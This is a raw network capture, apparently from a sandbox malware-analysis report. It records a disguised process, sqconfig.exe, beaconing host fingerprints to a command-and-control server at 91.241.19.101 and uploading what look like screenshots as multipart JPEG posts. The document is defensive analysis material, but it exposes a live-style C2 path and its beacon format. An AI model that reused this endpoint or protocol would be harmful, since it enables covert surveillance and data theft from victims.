                                                                  Sep 30, 2021 23:54:02.572859049 CEST19902OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:02.572876930 CEST19905OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:02.573401928 CEST19916OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:02.573467016 CEST19917OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:54:02.573703051 CEST19922OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:02.689856052 CEST19926OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:02.873862982 CEST19972INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  209192.168.2.35004591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:02.829034090 CEST19972OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:03.017433882 CEST19973INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:54:03.072485924 CEST19973OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:03.072582960 CEST19973OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:03.072793007 CEST19983OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:03.073092937 CEST19986OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:03.205499887 CEST20002OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:03.205563068 CEST20013OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:54:03.336955070 CEST20016OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:54:03.336997032 CEST20031OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:54:03.337029934 CEST20037OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
                                                                  Sep 30, 2021 23:54:03.337219000 CEST20050OUTData Raw: e9 ec cc bf b4 78 6f c0 da 7c 91 da 14 69 e4 39 10 a3 ef 96 66 ec 3d 87 e9 51 69 5a 5d dd 9f 86 35 ab fd 44 6d bf d4 63 96 79 53 fb 83 61 da bf 86 4f e7 8a d8 d3 7c 2d a2 69 13 79 d6 5a 74 51 ca 3a 3b 12 ec 3e 85 89 23 f0 ab 5a d7 fc 80 75 1f fa
                                                                  Data Ascii: xo|i9f=QiZ]5DmcySaO|-iyZtQ:;>#Zu@4UvaJemR]61Z)E2B){LE.E4b0Ryt;2`Sq74&1J8L)>@KGzE\wGEE|jC15(2&i]FsIEiE6)
                                                                  Sep 30, 2021 23:54:03.337415934 CEST20059OUTData Raw: 8e 93 65 22 da ea 43 2b 6f 32 79 a7 36 f2 02 31 e6 16 67 03 07 3d 8a 9e a3 88 2a 09 c9 a3 cb 53 58 38 be 66 ff 00 ad ac 6c a4 95 8f 6b d5 6c cd af 8c 5d fe c5 79 a7 2d c7 8a 2c e4 cd e9 0c 2f c8 76 1b a0 f9 57 6a ae e2 4e 37 e7 72 fc c3 a1 e2 35
                                                                  Data Ascii: e"C+o2y61g=*SX8flkl]y-,/vWjN7r5+/x\jz~s)*x!||q^ZPGAQN6]je[\]:ZLS(P7 =]\[.X(6PybU'>Db(Dh:*=%
                                                                  Sep 30, 2021 23:54:03.526798010 CEST20061INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  21192.168.2.34978091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:55.632445097 CEST7702OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:55.847352982 CEST7779INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  210192.168.2.35004691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:03.252532005 CEST20013OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:03.448817015 CEST20060INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  211192.168.2.35004791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:03.676803112 CEST20062OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:03.879793882 CEST20075INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  212192.168.2.35004891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:03.855699062 CEST20062OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:03.855834961 CEST20062OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:03.856005907 CEST20072OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:03.856144905 CEST20075OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:03.985873938 CEST20084OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:03.985935926 CEST20086OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:03.986139059 CEST20092OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:54:03.986180067 CEST20096OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:54:03.986316919 CEST20098OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:03.986913919 CEST20101OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:54:04.121799946 CEST20107OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:04.335077047 CEST20151INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  213192.168.2.35004991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:04.120884895 CEST20102OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:04.331180096 CEST20150INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  214192.168.2.35005091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:04.575973034 CEST20151OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:04.774615049 CEST20165INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  215192.168.2.35005191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:04.677791119 CEST20152OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:04.677841902 CEST20152OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
